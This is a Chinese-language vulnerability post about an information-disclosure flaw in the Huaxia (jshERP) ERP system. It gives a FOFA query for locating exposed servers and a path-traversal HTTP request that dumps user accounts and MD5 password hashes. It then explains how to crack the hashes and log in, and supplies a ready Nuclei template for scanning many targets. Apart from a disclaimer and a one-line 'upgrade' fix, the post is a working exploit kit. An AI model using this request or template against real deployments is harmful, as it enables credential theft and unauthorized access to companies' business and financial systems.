免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
华夏ERP基于SaaS模式,专注进销存+财务+生产功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询等。 华夏ERP系统存在信息泄露漏洞,恶意攻击者可能会利用该漏洞获取用户账号密码职位等敏感信息。
Ⅱ、fofa语句
"jshERP-boot"
Ⅲ、漏洞复现
POC
GET /user/registerUser/../../jshERP-boot/user/getAllList HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
1、发送数据包,查看用户信息
2、获取到账号和使用MD5加密过后的密码,解码登录
Ⅳ、Nuclei-POC
id: Huaxia-erp-info
info:
name: 华夏ERP系统存在信息泄露漏洞,恶意攻击者可能会利用该漏洞获取用户账号密码职位等敏感信息。
author: WLF
severity: high
metadata:
fofa-query: "jshERP-boot"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /user/registerUser/../../jshERP-boot/user/getAllList HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"userList","loginName")
Ⅴ、修复建议
升级至安全版本